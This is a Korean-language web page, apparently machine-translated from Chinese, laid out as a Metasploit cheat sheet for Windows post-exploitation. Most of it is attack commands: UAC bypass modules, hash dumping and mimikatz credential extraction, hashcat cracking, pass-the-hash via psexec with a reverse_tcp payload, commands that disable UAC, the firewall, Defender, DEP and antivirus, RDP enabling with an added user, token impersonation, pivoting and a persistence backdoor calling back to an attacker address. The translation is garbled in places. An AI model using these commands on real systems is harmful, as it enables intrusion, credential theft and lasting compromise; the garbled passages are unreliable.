후침투 프로세스

후침투 프로세스
권한 향상
UAC 우회
msf 모듈

Exploit/windows/local/bypassuac

Exploit/windows/local/bypassuac_injection

Exploit/windows/local/bypassuac_vbs

시스템 제권
프로그램 실행 수준 향상

msf 모듈(Exploit/windows/local/ask) 단점: uac 상호작용 필요

후침투 정보 수집
msf 모듈(post)

대상 호스트의 조닝(zoning) 확보: post/windows/gather/forensics/enum_drives

VM 판단: post/windows/gather/checkvm

활성화된 서비스: post/windows/gather/enum_applications

공유 보기: post/windows/gather/enum_shares

호스트의 최근 시스템 작업 확보: post/windows/gather/dumplinks

패치 보기: post/windows/gather/enum_applicationsenumpatches

scraper 스크립트 경로:/usr/share/metasploit-framework/scripts/meterpreter

(meterpreter run scraper) 정보를 저장하는 디렉터리:/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx

winenum 스크립트(meterpreter에서run winenum)

패킷 캡처
목적: 외곽과의 상호작용 장소를 잡는다. 내부 네트워크에 들어가는 방법을 찾을 수 없다(호스트는 방화벽에 있고 개방 포트가 적으며 서버의 서브넷이다)
가방을 쥐다
sniffer는 자신의merterpreter에서 발생하는 데이터를 필터하여 호스트와 관련된 패키지 정보를 직접 캡처합니다

sniffer 불러오기: load sniffer

네트워크 카드 정보 보기;sniffer_interfaces

오픈 감청: sniffer_start 1

패킷 내보내기: sniffer_dump 1 1.cap

포장을 풀다

auxiliary/sniffer/psnuffle

meterpreter 모듈

run packetrecorder

run post/windows/manage/rpcapd_start

잡다
기본: 암호 형식: 사용자 이름: RID: LM-HASH 값: NT-HASH 값 ###hash 값 가져오기

hashdump

run post/windows/gather/smart_hashdump

검사 권한 및 시스템 유형

도메인 제어 서버인지 확인

등록표에서hash를 읽고 lsass 프로세스를 주입

08 서버이고 관리자 권한이 있으면 getsystem에서 직접 권한을 부여합니다

win7이고 UAC가 닫히고 관리자 권한이 있으면 등록표에서 읽기

03/XP 직접 getsystem, 등록표에서hash

읽기

mimikatz(mimimikatz에 집합됨)

administrator 및 이상의 권한이 필요하며 무살

이 필요합니다.

privilege::debug#보기 권한

sekurlsa::logonpasswords#hash와 명문 비밀번호 가져오기(가능하면)

sekurlsa::ekeys#kerberos 암호화 증명서 획득

hash 해독

Hashcat

기사: (https://www.anquanke.com/post/id/177123)

hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

hash 전달 공격
UAC 레지스트리: HKEYLOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System
셸에 들어가기, 중국어 부호화, 입력chcp 65001셸 등록표 uac를 0

reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

으로 변경

MSF

exploit/windows/smb/psexec

use exploit/windows/smb/psexec set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128 set RHOST 192.168.206.101 set SMBUser administrator set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0 exploit

mimikkatz sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

방화벽 및 백신 소프트웨어 닫기
- 방화벽 닫기(shell) - Netsh advfirewall set allprofiles state off(관리자 및 이상의 권한)

Denfender 닫기(shell)

Net stop windefend

DEP 닫기(shell)

Bcdedit.exe/set {current} nx AlwaysOff

백신 소프트웨어 닫기(meterpreter)

Run killav

Run post/windows/manage/killava

원격 데스크톱

원격 데스크탑 오픈

run post/windows/manage/enable_rdp(사각형1)

run getgui -e(방식2)

run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt(원격 데스크탑 닫기)

원격 데스크탑 켜기 및 새 사용자 추가

run getgui -u root -p pass

원격 데스크탑을 열고 8888 포트에 바인딩

- `run getgui -e -f 8888`

캡처

load espia

screengrab

원격 데스크톱 연결kali 아래: rdesktop -u root -p 123 192.168.85.157

영패 가짜

윈도우즈 보안 관련 개념

session

Windows Station

Desktop

incognito

load incognito

list_tokens-u(상호작용이 아닌 token이 하나 더 나온다EA\Administrator

impersonate_token EA\Administrator

로그인 성공

널뛰기 공격

pivoting

이미 침입된 호스트를 발판으로 삼아 네트워크의 다른 시스템을 공격한다

라우팅 문제로 인해 직접 액세스할 수 없는 내부 네트워크 시스템에 액세스

라우팅 추가

방식1:run autoroute-s 192.168.102.0/24

방식2:run post/multi/manage/autoroute(업데이트)

win7을 이용하여 네트워크 서버 공격

네트워크 검색

run post/windows/gather/arp_scanner rhosts=192.168.102.0/24

use auxiliary/scanner/portscan/tcp

ProxyChains 프록시 설정

구성:vim/etc/proxychain.conf(ip 포함)

Socket 에이전트

auxiliary/server/socks4a

ProxyChains

ProxyChains는 GUN\Linux 운영체제를 위해 개발된 도구로 어떠한 TCP 연결도 TOP 또는SCOKS4,SCOKS5,HTTP/HTTPS를 통해 목적지까지 연결할 수 있다.이 채널 기술에서는 여러 개의 프록시 서버를 사용할 수 있다.이외에도 익명 방식을 제공한다. 예를 들어 중계판을 사용하는 프로그램도 중계판을 사용하는 프로그램에 사용할 수 있고, 발견된 새로운 네트워크를 직접 통신하는 데도 사용할 수 있다.

proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx

뒷문에 심다

meterpreter 후문:Metsvc

서비스를 통해 시작

run metsvc-A # 설정 포트, 백도어 파일 업로드

meterpreter 백도어:persistence

부팅을 통한 부팅

특성: 정기 회선, 시스템 시작 시 회선, 자동 운행

run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111

이 내용에 흥미가 있습니까?

현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:

cve-2019-0708 msf 실행 오류 해결

cve-2019-0708 msf 실행 오류 해결 서버에 빈틈이 있는지 검사하는 과정에서 exploit의 오류가 발견되었고 오류 정보는 다음과 같다. 이미 뚜렷하다Exploit aborted due to failure...

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.

후침투 프로세스

좋은 웹페이지 즐겨찾기